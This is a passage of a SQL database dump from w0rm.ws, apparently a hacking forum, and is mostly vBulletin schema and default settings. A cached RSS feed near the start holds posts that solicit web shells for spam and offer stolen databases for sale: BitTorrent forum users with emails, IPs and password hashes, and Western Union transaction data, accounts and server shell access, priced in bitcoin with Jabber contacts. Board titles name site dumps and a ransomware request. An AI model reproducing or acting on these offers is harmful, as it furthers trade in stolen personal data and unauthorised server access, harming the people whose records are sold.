DEFAULT '0', PRIMARY KEY (`cachehash`), KEY `dateline` (`dateline`,`cachehash`), KEY `forumid` (`forumid`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; INSERT INTO `externalcache` (`cachehash`, `text`, `headers`, `dateline`, `forumid`) VALUES ('aca1b48699cf31b2aa8aebeb34deeeca', '\r\n\r\n\n \n w0rm.ws\n https://w0rm.ws:443/\n w0rm.in * not so public IT community\n en\n Mon, 06 Jun 2016 17:14:44 GMT\n vBulletin\n 60\n \n https://w0rm.ws/images/sleekpassion/misc/rss.jpg\n w0rm.ws\n https://w0rm.ws:443/\n \n \n Need to buy traffic or web shell\n https://w0rm.ws:443/showthread.php?t=2508&goto=newpost\n Sat, 28 May 2016 15:42:54 GMT\n \n Hello
\r\nI\', So Sorry for make this Thread
\r\n
\r\nI need to buy traffic or web shell(use for spam)
\r\nI not have problem to payment and money value
\r\n
\r\nif anyone Have this service Please contact me
\r\n
\r\nExploitkit@jabb3r.org
\r\n
\r\n
\r\n
\r\nKing Regard
\r\nHunter Ekit
\r\n\r\n]]>\n services\n hunter_exploitkit\n https://w0rm.ws:443/showthread.php?t=2508\n \n \n BitTorrent\n https://w0rm.ws:443/showthread.php?t=2506&goto=newpost\n Fri, 20 May 2016 16:44:19 GMT\n \n BitTorrent forum db
\r\n34k users
\r\nname email ip_address concat(members_pass_hash,\':\',members_pass_salt)
\r\n
\r\nPrice: OFFER ME
\r\n
\r\nJabber: ke7hb@w0rm.ws\r\n\r\n]]>
\n dumps\n ke7hb\n https://w0rm.ws:443/showthread.php?t=2506\n
\n \n westernunion.com\n https://w0rm.ws:443/showthread.php?t=2505&goto=newpost\n Fri, 20 May 2016 15:43:15 GMT\n 2TB data \nHistory of transactions \nAccounts (SHA1 hashed, users + employees) \nShell on storage server (not wu.com) \n \ndb only: 6k in BTC \ndb + shell:...\n 2TB data
\nHistory of transactions
\nAccounts (SHA1 hashed, users + employees)
\nShell on storage server (not wu.com)
\n
\ndb only: 6k in BTC
\ndb + shell: 17k in BTC
\n
\nJabber: ke7hb@w0rm.ws\r\n\r\n]]>
\n dumps\n ke7hb\n https://w0rm.ws:443/showthread.php?t=2505\n
\n \n\n', 'a:5:{i:0;s:33:\"Cache-control: max-age=1465236884\";i:1;s:38:\"Expires: Mon, 06 Jun 2016 18:14:44 GMT\";i:2;s:44:\"Last-Modified: Mon, 06 Jun 2016 17:14:44 GMT\";i:3;s:40:\"ETag: \"aca1b48699cf31b2aa8aebeb34deeeca\"\";i:4;s:42:\"Content-Type: text/xml; charset=ISO-8859-1\";}', 1465233284, 0); DROP TABLE IF EXISTS `faq`; CREATE TABLE `faq` ( `faqname` varchar(250) CHARACTER SET latin1 COLLATE latin1_bin NOT NULL DEFAULT '', `faqparent` varchar(50) NOT NULL DEFAULT '', `displayorder` smallint(5) unsigned NOT NULL DEFAULT '0', `volatile` smallint(5) unsigned NOT NULL DEFAULT '0', `product` varchar(25) NOT NULL DEFAULT '', PRIMARY KEY (`faqname`), KEY `faqparent` (`faqparent`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; INSERT INTO `faq` (`faqname`, `faqparent`, `displayorder`, `volatile`, `product`) VALUES ('vb3_albums', 'vb3_user_profile', 9, 1, ''), ('vb3_announcements', 'vb3_board_usage', 4, 1, ''), ('vb3_attachments', 'vb3_reading_posting', 5, 1, ''), ('vb3_board_faq', 'faqroot', 200, 1, ''), ('vb3_board_usage', 'vb3_board_faq', 10, 1, ''), ('vb3_calendar', 'vb3_board_usage', 12, 1, ''), ('vb3_changing_details', 'vb3_user_profile', 3, 1, ''), ('vb3_contact_members', 'vb3_board_usage', 16, 1, ''), ('vb3_cookies', 'vb3_board_usage', 10, 1, ''), ('vb3_editing_deleting', 'vb3_reading_posting', 3, 1, ''), ('vb3_forums_threads_posts', 'vb3_board_usage', 1, 1, ''), ('vb3_friends_contacts', 'vb3_user_profile', 8, 1, ''), ('vb3_lost_passwords', 'vb3_board_usage', 11, 1, ''), ('vb3_members_list', 'vb3_board_usage', 13, 1, ''), ('vb3_message_icons', 'vb3_reading_posting', 7, 1, ''), ('vb3_mods_admins', 'vb3_reading_posting', 8, 1, ''), ('vb3_new_posts', 'vb3_board_usage', 6, 1, ''), ('vb3_notifications', 'vb3_board_usage', 14, 1, ''), ('vb3_other_settings', 'vb3_user_profile', 5, 1, ''), ('vb3_polls', 'vb3_reading_posting', 4, 1, ''), ('vb3_posting', 'vb3_reading_posting', 1, 1, ''), ('vb3_private_messages', 'vb3_user_profile', 10, 1, ''), ('vb3_profile_custom', 'vb3_user_profile', 6, 1, ''), ('vb3_public_profile', 'vb3_user_profile', 1, 1, ''), ('vb3_quick_links', 'vb3_board_usage', 15, 1, ''), ('vb3_rating_threads', 'vb3_board_usage', 7, 1, ''), ('vb3_reading_posting', 'vb3_board_faq', 30, 1, ''), ('vb3_register', 'vb3_board_usage', 2, 1, ''), ('vb3_replying', 'vb3_reading_posting', 2, 1, ''), ('vb3_reputation', 'vb3_user_profile', 12, 1, ''), ('vb3_rss_podcasting', 'vb3_board_usage', 18, 1, ''), ('vb3_search', 'vb3_board_usage', 3, 1, ''), ('vb3_signatures_avatars', 'vb3_user_profile', 4, 1, ''), ('vb3_smilies', 'vb3_reading_posting', 6, 1, ''), ('vb3_social_groups', 'vb3_user_profile', 7, 1, ''), ('vb3_subscriptions', 'vb3_user_profile', 11, 1, ''), ('vb3_tags', 'vb3_board_usage', 9, 1, ''), ('vb3_thread_display', 'vb3_board_usage', 5, 1, ''), ('vb3_thread_tools', 'vb3_board_usage', 8, 1, ''), ('vb3_troublesome_users', 'vb3_board_usage', 17, 1, ''), ('vb3_user_cp', 'vb3_user_profile', 2, 1, ''), ('vb3_user_profile', 'vb3_board_faq', 20, 1, ''); DROP TABLE IF EXISTS `forum`; CREATE TABLE `forum` ( `forumid` smallint(5) unsigned NOT NULL AUTO_INCREMENT, `styleid` smallint(5) unsigned NOT NULL DEFAULT '0', `title` varchar(100) NOT NULL DEFAULT '', `title_clean` varchar(100) NOT NULL DEFAULT '', `description` text, `description_clean` text, `options` int(10) unsigned NOT NULL DEFAULT '0', `showprivate` tinyint(3) unsigned NOT NULL DEFAULT '0', `displayorder` smallint(6) NOT NULL DEFAULT '0', `replycount` int(10) unsigned NOT NULL DEFAULT '0', `lastpost` int(11) NOT NULL DEFAULT '0', `lastposter` varchar(100) NOT NULL DEFAULT '', `lastpostid` int(10) unsigned NOT NULL DEFAULT '0', `lastthread` varchar(250) NOT NULL DEFAULT '', `lastthreadid` int(10) unsigned NOT NULL DEFAULT '0', `lasticonid` smallint(6) NOT NULL DEFAULT '0', `lastprefixid` varchar(25) NOT NULL DEFAULT '', `threadcount` mediumint(8) unsigned NOT NULL DEFAULT '0', `daysprune` smallint(6) NOT NULL DEFAULT '0', `newpostemail` text, `newthreademail` text, `parentid` smallint(6) NOT NULL DEFAULT '0', `parentlist` varchar(250) NOT NULL DEFAULT '', `password` varchar(50) NOT NULL DEFAULT '', `link` varchar(200) NOT NULL DEFAULT '', `childlist` text, `defaultsortfield` varchar(50) NOT NULL DEFAULT 'lastpost', `defaultsortorder` enum('asc','desc') NOT NULL DEFAULT 'desc', `imageprefix` varchar(100) NOT NULL DEFAULT '', PRIMARY KEY (`forumid`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; INSERT INTO `forum` (`forumid`, `styleid`, `title`, `title_clean`, `description`, `description_clean`, `options`, `showprivate`, `displayorder`, `replycount`, `lastpost`, `lastposter`, `lastpostid`, `lastthread`, `lastthreadid`, `lasticonid`, `lastprefixid`, `threadcount`, `daysprune`, `newpostemail`, `newthreademail`, `parentid`, `parentlist`, `password`, `link`, `childlist`, `defaultsortfield`, `defaultsortorder`, `imageprefix`) VALUES (1, 0, 'invites', 'invites', '', '', 86017, 0, 1, 0, 0, '', 0, '', 0, 0, '', 0, -1, '', '', -1, '1,-1', '', '', '1,2,4,-1', 'lastpost', 'desc', ''), (2, 0, 'new', 'new', '', '', 89799, 0, 2, 647, 1443389868, 'Invite', 2862, 'mrsalvadore', 2387, 0, '', 634, -1, '', '', 1, '2,1,-1', '', '', '2,-1', 'lastpost', 'desc', ''), (4, 0, 'activated', 'activated', '', '', 97991, 0, 3, 2, 1439233133, 'Invite', 2285, 'tdss', 1853, 0, '', 2, -1, '', '', 1, '4,1,-1', '', '', '4,-1', 'lastpost', 'desc', ''), (6, 0, 'security', 'security', '', '', 97987, 0, 4, 2, 1403311001, 'w0rm', 1014, 'about', 1012, 0, '', 2, -1, '', '', -1, '6,-1', '', '', '6,7,9,10,-1', 'lastpost', 'desc', ''), (7, 0, 'remote', 'remote', '', '', 97991, 0, 5, 229, 1462791410, 'admin', 3042, 'zoosk.com dump', 2503, 0, '', 56, -1, '', '', 6, '7,6,-1', '', '', '7,-1', 'lastpost', 'desc', ''), (9, 0, 'local', 'local', '', '', 97991, 0, 6, 10, 1411933014, 'w0rm', 2210, 'Linksys Smart Wi-Fi Router EA6500', 1648, 0, '', 4, -1, '', '', 6, '9,6,-1', '', '', '9,-1', 'lastpost', 'desc', ''), (10, 0, 'dumps', 'dumps', '', '', 97991, 0, 7, 19, 1448260568, 'dark001', 2932, 'Hacking Tools resources list', 2418, 0, '', 9, -1, '', '', 6, '10,6,-1', '', '', '10,-1', 'lastpost', 'desc', ''), (11, 0, 'project', 'project', '', '', 86017, 0, 2, 0, 0, '', 0, '', 0, 0, '', 0, -1, '', '', -1, '11,-1', '', '', '11,13,-1', 'lastpost', 'desc', ''), (13, 0, 'news', 'news', '', '', 97991, 0, 13, 64, 1448155601, 'unixman', 2931, 'stells is ripper that i did escrow with', 2417, 0, '', 17, -1, '', '', 11, '13,11,-1', '', '', '13,-1', 'lastpost', 'desc', ''), (14, 0, 'coding', 'coding', '', '', 86017, 0, 8, 0, 0, '', 0, '', 0, 0, '', 0, -1, '', '', -1, '14,-1', '', '', '14,16,15,-1', 'lastpost', 'desc', ''), (15, 0, 'source', 'source', '', '', 97991, 0, 10, 59, 1462955681, 'Scrack', 3043, '(REQ) GM Cryptolocker', 2504, 0, '', 24, -1, '', '', 14, '15,14,-1', '', '', '15,-1', 'lastpost', 'desc', ''), (16, 0, 'develop', 'develop', '', '', 97991, 0, 9, 3, 1403473503, 'Psych0tr1a', 1070, '[Ruby] LFI via phpinfo() exploit', 1062, 0, '', 3, -1, '', '', 14, '16,14,-1', '', '', '16,-1', 'lastpost', 'desc', ''), (17, 0, 'other', 'other', '', '', 86017, 0, 15, 0, 0, '', 0, '', 0, 0, '', 0, -1, '', '', -1, '17,-1', '', '', '17,24,18,-1', 'lastpost', 'desc', ''), (18, 0, 'flame', 'flame', '', '', 97991, 0, 16, 1, 1464181751, 'st1x0', 3047, 'db icloud', 2507, 0, '', 1, -1, '', '', 17, '18,17,-1', '', '', '18,-1', 'lastpost', 'desc', ''), (24, 0, 'black list', 'black list', '', '', 97991, 0, 1, 1, 1464452024, 'ke7hb', 3050, 'D+P seller = banned!', 2509, 0, '', 1, -1, '', '', 17, '24,17,-1', '', '', '24,-1', 'lastpost', 'desc', ''), (31, 0, 'Market', 'Market', '', '', 98043, 0, 9, 0, 0, '', 0, '', 0, 0, '', 0, -1, '', '', -1, '31,-1', '', '', '31,32,35,36,39,37,38,-1', 'lastpost', 'desc', 'w0rm'), (32, 0, 'services', 'services', '', '', 98047, 0, 1, 4, 1457279382, 'tdss', 3021, 'w0rm.ws Jabber', 2239, 0, '', 1, -1, '', '', 31, '32,31,-1', '', '', '32,-1', 'lastpost', 'desc', ''), (35, 0, 'remote', 'remote', '', '', 98047, 0, 2, 0, 0, '', 0, '', 0, 0, '', 0, -1, '', '', 31, '35,31,-1', '', '', '35,-1', 'lastpost', 'desc', ''), (36, 0, 'local', 'local', '', '', 98047, 0, 3, 0, 0, '', 0, '', 0, 0, '', 0, -1, '', '', 31, '36,31,-1', '', '', '36,-1', 'lastpost', 'desc', ''), (37, 0, 'dumps', 'dumps', '', '', 98047, 0, 5, 22, 1463762659, 'ke7hb', 3046, 'BitTorrent', 2506, 0, '', 10, -1, '', '', 31, '37,31,-1', '', '', '37,-1', 'lastpost', 'desc', ''), (38, 0, 'other', 'other', '', '', 98047, 0, 6, 0, 0, '', 0, '', 0, 0, '', 0, -1, '', '', 31, '38,31,-1', '', '', '38,-1', 'lastpost', 'desc', ''), (39, 0, 'source', 'source', '', '', 97991, 0, 4, 0, 0, '', 0, '', 0, 0, '', 0, -1, '', '', 31, '39,31,-1', '', '', '39,-1', 'lastpost', 'desc', ''); DROP TABLE IF EXISTS `forumpermission`; CREATE TABLE `forumpermission` ( `forumpermissionid` int(10) unsigned NOT NULL AUTO_INCREMENT, `forumid` smallint(5) unsigned NOT NULL DEFAULT '0', `usergroupid` smallint(5) unsigned NOT NULL DEFAULT '0', `forumpermissions` int(10) unsigned NOT NULL DEFAULT '0', PRIMARY KEY (`forumpermissionid`), UNIQUE KEY `ugid_fid` (`usergroupid`,`forumid`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; INSERT INTO `forumpermission` (`forumpermissionid`, `forumid`, `usergroupid`, `forumpermissions`) VALUES (9, 3, 1, 0), (10, 3, 2, 16777215), (11, 3, 3, 0), (12, 3, 4, 0), (13, 3, 5, 16777215), (14, 3, 6, 16777215), (15, 3, 7, 16777215), (16, 3, 8, 0), (25, 8, 1, 0), (26, 8, 2, 16777215), (27, 8, 3, 0), (28, 8, 4, 0), (29, 8, 5, 16777215), (30, 8, 6, 16777215), (31, 8, 7, 16777215), (32, 8, 8, 0), (115, 17, 1, 0), (121, 1, 1, 0), (122, 1, 2, 0), (123, 1, 3, 0), (124, 1, 4, 0), (125, 1, 5, 0), (126, 1, 6, 0), (127, 1, 7, 0), (128, 1, 8, 0), (129, 11, 1, 0), (130, 11, 2, 0), (131, 11, 3, 0), (132, 11, 4, 0), (133, 11, 5, 0), (134, 11, 6, 0), (135, 11, 7, 0), (136, 11, 8, 0), (137, 6, 1, 0), (138, 6, 2, 0), (139, 6, 3, 0), (140, 6, 4, 0), (141, 6, 5, 0), (142, 6, 6, 16777215), (143, 6, 7, 16777215), (144, 6, 8, 0), (145, 14, 1, 0), (146, 14, 2, 16777215), (147, 14, 3, 0), (148, 14, 4, 0), (149, 14, 5, 16777215), (150, 14, 6, 16777215), (151, 14, 7, 16777215), (152, 14, 8, 0), (153, 13, 6, 16777215), (154, 13, 2, 16777215), (155, 7, 2, 16777215), (156, 7, 5, 16777215), (157, 16, 2, 16777215); DROP TABLE IF EXISTS `forumprefixset`; CREATE TABLE `forumprefixset` ( `forumid` int(10) unsigned NOT NULL DEFAULT '0', `prefixsetid` varchar(25) NOT NULL DEFAULT '', PRIMARY KEY (`forumid`,`prefixsetid`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; DROP TABLE IF EXISTS `forumread`; CREATE TABLE `forumread` ( `userid` int(10) unsigned NOT NULL DEFAULT '0', `forumid` smallint(5) unsigned NOT NULL DEFAULT '0', `readtime` int(10) unsigned NOT NULL DEFAULT '0', PRIMARY KEY (`forumid`,`userid`), KEY `readtime` (`readtime`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; DROP TABLE IF EXISTS `groupmessage`; CREATE TABLE `groupmessage` ( `gmid` int(10) unsigned NOT NULL AUTO_INCREMENT, `discussionid` int(10) unsigned NOT NULL DEFAULT '0', `postuserid` int(10) unsigned NOT NULL DEFAULT '0', `postusername` varchar(100) NOT NULL DEFAULT '', `dateline` int(10) unsigned NOT NULL DEFAULT '0', `state` enum('visible','moderation','deleted') NOT NULL DEFAULT 'visible', `title` varchar(255) NOT NULL DEFAULT '', `pagetext` mediumtext, `ipaddress` int(10) unsigned NOT NULL DEFAULT '0', `allowsmilie` smallint(5) unsigned NOT NULL DEFAULT '0', `reportthreadid` int(10) unsigned NOT NULL DEFAULT '0', PRIMARY KEY (`gmid`), KEY `postuserid` (`postuserid`,`discussionid`,`state`), KEY `discussionid` (`discussionid`,`dateline`,`state`), FULLTEXT KEY `gm_ft` (`title`,`pagetext`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1; DROP TABLE IF EXISTS `groupmessage_hash`; CREATE TABLE `groupmessage_hash` ( `postuserid` int(10) unsigned NOT NULL DEFAULT '0', `groupid` int(10) unsigned NOT NULL DEFAULT '0', `dupehash` varchar(32) NOT NULL DEFAULT '', `dateline` int(10) unsigned NOT NULL DEFAULT '0', KEY `postuserid` (`postuserid`,`dupehash`), KEY `dateline` (`dateline`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; DROP TABLE IF EXISTS `groupread`; CREATE TABLE `groupread` ( `userid` int(10) unsigned NOT NULL, `groupid` int(10) unsigned NOT NULL, `readtime` int(10) unsigned NOT NULL, PRIMARY KEY (`userid`,`groupid`), KEY `readtime` (`readtime`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; DROP TABLE IF EXISTS `holiday`; CREATE TABLE `holiday` ( `holidayid` int(10) unsigned NOT NULL AUTO_INCREMENT, `varname` varchar(100) NOT NULL DEFAULT '', `recurring` smallint(5) unsigned NOT NULL DEFAULT '0', `recuroption` char(6) NOT NULL DEFAULT '', `allowsmilies` smallint(6) NOT NULL DEFAULT '1', PRIMARY KEY (`holidayid`), KEY `varname` (`varname`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; DROP TABLE IF EXISTS `humanverify`; CREATE TABLE `humanverify` ( `hash` char(32) NOT NULL DEFAULT '', `answer` mediumtext, `dateline` int(10) unsigned NOT NULL DEFAULT '0', `viewed` smallint(5) unsigned NOT NULL DEFAULT '0', KEY `hash` (`hash`), KEY `dateline` (`dateline`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; DROP TABLE IF EXISTS `hvanswer`; CREATE TABLE `hvanswer` ( `answerid` int(11) NOT NULL AUTO_INCREMENT, `questionid` int(11) NOT NULL DEFAULT '0', `answer` varchar(255) NOT NULL DEFAULT '', `dateline` int(10) unsigned NOT NULL DEFAULT '0', PRIMARY KEY (`answerid`), KEY `questionid` (`questionid`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; DROP TABLE IF EXISTS `hvquestion`; CREATE TABLE `hvquestion` ( `questionid` int(10) unsigned NOT NULL AUTO_INCREMENT, `regex` varchar(255) NOT NULL DEFAULT '', `dateline` int(10) unsigned NOT NULL DEFAULT '0', PRIMARY KEY (`questionid`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; DROP TABLE IF EXISTS `icon`; CREATE TABLE `icon` ( `iconid` smallint(5) unsigned NOT NULL AUTO_INCREMENT, `title` varchar(100) NOT NULL DEFAULT '', `iconpath` varchar(100) NOT NULL DEFAULT '', `imagecategoryid` smallint(5) unsigned NOT NULL DEFAULT '0', `displayorder` smallint(5) unsigned NOT NULL DEFAULT '1', PRIMARY KEY (`iconid`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; INSERT INTO `icon` (`iconid`, `title`, `iconpath`, `imagecategoryid`, `displayorder`) VALUES (1, 'Post', 'images/icons/icon1.gif', 2, 1), (2, 'Arrow', 'images/icons/icon2.gif', 2, 1), (3, 'Lightbulb', 'images/icons/icon3.gif', 2, 1), (4, 'Exclamation', 'images/icons/icon4.gif', 2, 1), (5, 'Question', 'images/icons/icon5.gif', 2, 1), (6, 'Cool', 'images/icons/icon6.gif', 2, 1), (7, 'Smile', 'images/icons/icon7.gif', 2, 1), (8, 'Angry', 'images/icons/icon8.gif', 2, 1), (9, 'Unhappy', 'images/icons/icon9.gif', 2, 1), (10, 'Talking', 'images/icons/icon10.gif', 2, 1), (11, 'Red face', 'images/icons/icon11.gif', 2, 1), (12, 'Wink', 'images/icons/icon12.gif', 2, 1), (13, 'Thumbs down', 'images/icons/icon13.gif', 2, 1), (14, 'Thumbs up', 'images/icons/icon14.gif', 2, 1); DROP TABLE IF EXISTS `imagecategory`; CREATE TABLE `imagecategory` ( `imagecategoryid` smallint(5) unsigned NOT NULL AUTO_INCREMENT, `title` varchar(255) NOT NULL DEFAULT '', `imagetype` smallint(5) unsigned NOT NULL DEFAULT '0', `displayorder` smallint(5) unsigned NOT NULL DEFAULT '0', PRIMARY KEY (`imagecategoryid`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; INSERT INTO `imagecategory` (`imagecategoryid`, `title`, `imagetype`, `displayorder`) VALUES (1, 'Generic Smilies', 3, 1), (2, 'Generic Icons', 2, 1), (3, 'Generic Avatars', 1, 1); DROP TABLE IF EXISTS `imagecategorypermission`; CREATE TABLE `imagecategorypermission` ( `imagecategoryid` smallint(5) unsigned NOT NULL DEFAULT '0', `usergroupid` smallint(5) unsigned NOT NULL DEFAULT '0', KEY `imagecategoryid` (`imagecategoryid`,`usergroupid`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; DROP TABLE IF EXISTS `infraction`; CREATE TABLE `infraction` ( `infractionid` int(10) unsigned NOT NULL AUTO_INCREMENT, `infractionlevelid` int(10) unsigned NOT NULL DEFAULT '0', `postid` int(10) unsigned NOT NULL DEFAULT '0', `userid` int(10) unsigned NOT NULL DEFAULT '0', `whoadded` int(10) unsigned NOT NULL DEFAULT '0', `points` int(10) unsigned NOT NULL DEFAULT '0', `dateline` int(10) unsigned NOT NULL DEFAULT '0', `note` varchar(255) NOT NULL DEFAULT '', `action` smallint(5) unsigned NOT NULL DEFAULT '0', `actiondateline` int(10) unsigned NOT NULL DEFAULT '0', `actionuserid` int(10) unsigned NOT NULL DEFAULT '0', `actionreason` varchar(255) NOT NULL DEFAULT '0', `expires` int(10) unsigned NOT NULL DEFAULT '0', `threadid` int(10) unsigned NOT NULL DEFAULT '0', `customreason` varchar(255) NOT NULL DEFAULT '', PRIMARY KEY (`infractionid`), KEY `expires` (`expires`,`action`), KEY `userid` (`userid`,`action`), KEY `infractonlevelid` (`infractionlevelid`), KEY `postid` (`postid`), KEY `threadid` (`threadid`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; DROP TABLE IF EXISTS `infractionban`; CREATE TABLE `infractionban` ( `infractionbanid` int(10) unsigned NOT NULL AUTO_INCREMENT, `usergroupid` int(11) NOT NULL DEFAULT '0', `banusergroupid` int(10) unsigned NOT NULL DEFAULT '0', `amount` int(10) unsigned NOT NULL DEFAULT '0', `period` char(5) NOT NULL DEFAULT '', `method` enum('points','infractions') NOT NULL DEFAULT 'infractions', PRIMARY KEY (`infractionbanid`), KEY `usergroupid` (`usergroupid`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; DROP TABLE IF EXISTS `infractiongroup`; CREATE TABLE `infractiongroup` ( `infractiongroupid` int(10) unsigned NOT NULL AUTO_INCREMENT, `usergroupid` int(11) NOT NULL DEFAULT '0', `orusergroupid` smallint(5) unsigned NOT NULL DEFAULT '0', `pointlevel` int(10) unsigned NOT NULL DEFAULT '0', `override` smallint(5) unsigned NOT NULL DEFAULT '0', PRIMARY KEY (`infractiongroupid`), KEY `usergroupid` (`usergroupid`,`pointlevel`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; DROP TABLE IF EXISTS `infractionlevel`; CREATE TABLE `infractionlevel` ( `infractionlevelid` int(10) unsigned NOT NULL AUTO_INCREMENT, `points` int(10) unsigned NOT NULL DEFAULT '0', `expires` int(10) unsigned NOT NULL DEFAULT '0', `period` enum('H','D','M','N') NOT NULL DEFAULT 'H', `warning` smallint(5) unsigned NOT NULL DEFAULT '0', `extend` smallint(5) unsigned NOT NULL DEFAULT '0', PRIMARY KEY (`infractionlevelid`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; INSERT INTO `infractionlevel` (`infractionlevelid`, `points`, `expires`, `period`, `warning`, `extend`) VALUES (1, 1, 10, 'D', 1, 0), (2, 1, 10, 'D', 1, 0), (3, 1, 10, 'D', 1, 0), (4, 1, 10, 'D', 1, 0); DROP TABLE IF EXISTS `language`; CREATE TABLE `language` ( `languageid` smallint(5) unsigned NOT NULL AUTO_INCREMENT, `title` varchar(50) NOT NULL DEFAULT '', `userselect` smallint(5) unsigned NOT NULL DEFAULT '1', `options` smallint(5) unsigned NOT NULL DEFAULT '1', `languagecode` varchar(12) NOT NULL DEFAULT '', `charset` varchar(15) NOT NULL DEFAULT '', `imagesoverride` varchar(150) NOT NULL DEFAULT '', `dateoverride` varchar(50) NOT NULL DEFAULT '', `timeoverride` varchar(50) NOT NULL DEFAULT '', `registereddateoverride` varchar(50) NOT NULL DEFAULT '', `calformat1override` varchar(50) NOT NULL DEFAULT '', `calformat2override` varchar(50) NOT NULL DEFAULT '', `logdateoverride` varchar(50) NOT NULL DEFAULT '', `locale` varchar(20) NOT NULL DEFAULT '', `decimalsep` char(1) NOT NULL DEFAULT '.', `thousandsep` char(1) NOT NULL DEFAULT ',', `phrasegroup_global` mediumtext, `phrasegroup_cpglobal` mediumtext, `phrasegroup_cppermission` mediumtext, `phrasegroup_forum` mediumtext, `phrasegroup_calendar` mediumtext, `phrasegroup_attachment_image` mediumtext, `phrasegroup_style` mediumtext, `phrasegroup_logging` mediumtext, `phrasegroup_cphome` mediumtext, `phrasegroup_promotion` mediumtext, `phrasegroup_user` mediumtext, `phrasegroup_help_faq` mediumtext, `phrasegroup_sql` mediumtext, `phrasegroup_subscription` mediumtext, `phrasegroup_language` mediumtext, `phrasegroup_bbcode` mediumtext, `phrasegroup_stats` mediumtext, `phrasegroup_diagnostic` mediumtext, `phrasegroup_maintenance` mediumtext, `phrasegroup_profilefield` mediumtext, `phrasegroup_thread` mediumtext, `phrasegroup_timezone` mediumtext, `phrasegroup_banning` mediumtext, `phrasegroup_reputation` mediumtext, `phrasegroup_wol` mediumtext, `phrasegroup_threadmanage` mediumtext, `phrasegroup_pm` mediumtext, `phrasegroup_cpuser` mediumtext, `phrasegroup_accessmask` mediumtext, `phrasegroup_cron` mediumtext, `phrasegroup_moderator` mediumtext, `phrasegroup_cpoption` mediumtext, `phrasegroup_cprank` mediumtext, `phrasegroup_cpusergroup` mediumtext, `phrasegroup_holiday` mediumtext, `phrasegroup_posting` mediumtext, `phrasegroup_poll` mediumtext, `phrasegroup_fronthelp` mediumtext, `phrasegroup_register` mediumtext, `phrasegroup_search` mediumtext, `phrasegroup_showthread` mediumtext, `phrasegroup_postbit` mediumtext, `phrasegroup_forumdisplay` mediumtext, `phrasegroup_messaging` mediumtext, `phrasegroup_inlinemod` mediumtext, `phrasegroup_plugins` mediumtext, `phrasegroup_cprofilefield` mediumtext, `phrasegroup_reputationlevel` mediumtext, `phrasegroup_infraction` mediumtext, `phrasegroup_infractionlevel` mediumtext, `phrasegroup_notice` mediumtext, `phrasegroup_prefix` mediumtext, `phrasegroup_prefixadmin` mediumtext, `phrasegroup_album` mediumtext, `phrasegroup_socialgroups` mediumtext, PRIMARY KEY (`languageid`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1; INSERT INTO `language` (`languageid`, `title`, `userselect`, `options`, `languagecode`, `charset`, `imagesoverride`, `dateoverride`, `timeoverride`, `registereddateoverride`, `calformat1override`, `calformat2override`, `logdateoverride`, `locale`, `decimalsep`, `thousandsep`, `phrasegroup_global`, `phrasegroup_cpglobal`, `phrasegroup_cppermission`, `phrasegroup_forum`, `phrasegroup_calendar`, `phrasegroup_attachment_image`, `phrasegroup_style`, `phrasegroup_logging`, `phrasegroup_cphome`, `phrasegroup_promotion`, `phrasegroup_user`, `phrasegroup_help_faq`, `phrasegroup_sql`, `phrasegroup_subscription`, `phrasegroup_language`, `phrasegroup_bbcode`, `phrasegroup_stats`, `phrasegroup_diagnostic`, `phrasegroup_maintenance`, `phrasegroup_profilefield`, `phrasegroup_thread`, `phrasegroup_timezone`, `phrasegroup_banning`, `phrasegroup_reputation`, `phrasegroup_wol`, `phrasegroup_threadmanage`, `phrasegroup_pm`, `phrasegroup_cpuser`, `phrasegroup_accessmask`, `phrasegroup_cron`, `phrasegroup_moderator`, `phrasegroup_cpoption`, `phrasegroup_cprank`, `phrasegroup_cpusergroup`, `phrasegroup_holiday`, `phrasegroup_posting`, `phrasegroup_poll`, `phrasegroup_fronthelp`, `phrasegroup_register`, `phrasegroup_search`, `phrasegroup_showthread`, `phrasegroup_postbit`, `phrasegroup_forumdisplay`, `phrasegroup_messaging`, `phrasegroup_inlinemod`, `phrasegroup_plugins`, `phrasegroup_cprofilefield`, `phrasegroup_reputationlevel`, `phrasegroup_infraction`, `phrasegroup_infractionlevel`, `phrasegroup_notice`, `phrasegroup_prefix`, `phrasegroup_prefixadmin`, `phrasegroup_album`, `phrasegroup_socialgroups`) VALUES (1, 'English (US)', 1, 1, 'en', 'ISO-8859-1', '', '', '', '', '', '', '', '', '.', ',', 'a:570:{s:9:\"1_day_ago\";s:9:\"1 Day Ago\";s:10:\"1_hour_ago\";s:10:\"1 Hour Ago\";s:12:\"1_minute_ago\";s:12:\"1 Minute Ago\";s:10:\"1_week_ago\";s:10:\"1 Week Ago\";s:14:\"a_closed_forum\";s:14:\"A Closed Forum\";s:6:\"accept\";s:6:\"Accept\";s:6:\"action\";s:6:\"Action\";s:14:\"active_members\";s:14:\"Active Members\";s:20:\"active_subscriptions\";s:20:\"Active Subscriptions\";s:15:\"add_new_folders\";s:15:\"Add New Folders\";s:16:\"add_subscription\";s:16:\"Add Subscription\";s:17:\"add_x_to_contacts\";s:25:\"Add %1$s to Your Contacts\";s:5:\"admin\";s:5:\"Admin\";s:19:\"admin_control_panel\";s:19:\"Admin Control Panel\";s:23:\"admin_required_register\";s:116:\"The administrator may have required you to register before you can view this page.\";s:29:\"administrator_decided_x_quiet\";s:85:\"The administrator has decided that %1$s should be quiet for a while.\";s:34:\"administrator_may_disabled_account\";s:110:\"If you are trying to post, the administrator may have disabled your account, or it may be awaiting activation.\";s:15:\"advanced_search\";s:15:\"Advanced 